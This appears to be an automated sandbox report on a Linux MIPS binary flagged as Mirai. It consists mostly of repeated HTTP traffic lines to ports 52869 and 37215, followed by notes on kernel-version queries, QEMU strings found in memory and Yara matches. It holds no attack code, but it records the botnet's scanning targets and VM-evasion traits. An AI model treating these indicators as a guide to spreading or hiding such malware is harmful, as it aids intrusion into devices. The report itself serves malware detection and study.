Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36066 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36068 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36066
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36068
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50650 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53970 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53976 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54542 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57466
Source: unknown	Network traffic detected: HTTP traffic on port 57468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57468
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38252 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45032 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53854 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34466 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40054 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34330 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58138 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54176 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43948 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 52869

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/KHSQ48GkGn (PID: 5238)

Queries kernel information via 'uname':

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: KHSQ48GkGn, 5238.1.000000004cffab3f.00000000008c8373.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/KHSQ48GkGnSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/KHSQ48GkGn
Source: KHSQ48GkGn, 5238.1.00000000b21f652b.00000000ecc012f9.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: KHSQ48GkGn, 5238.1.00000000b21f652b.00000000ecc012f9.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: KHSQ48GkGn, 5238.1.000000004cffab3f.00000000008c8373.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP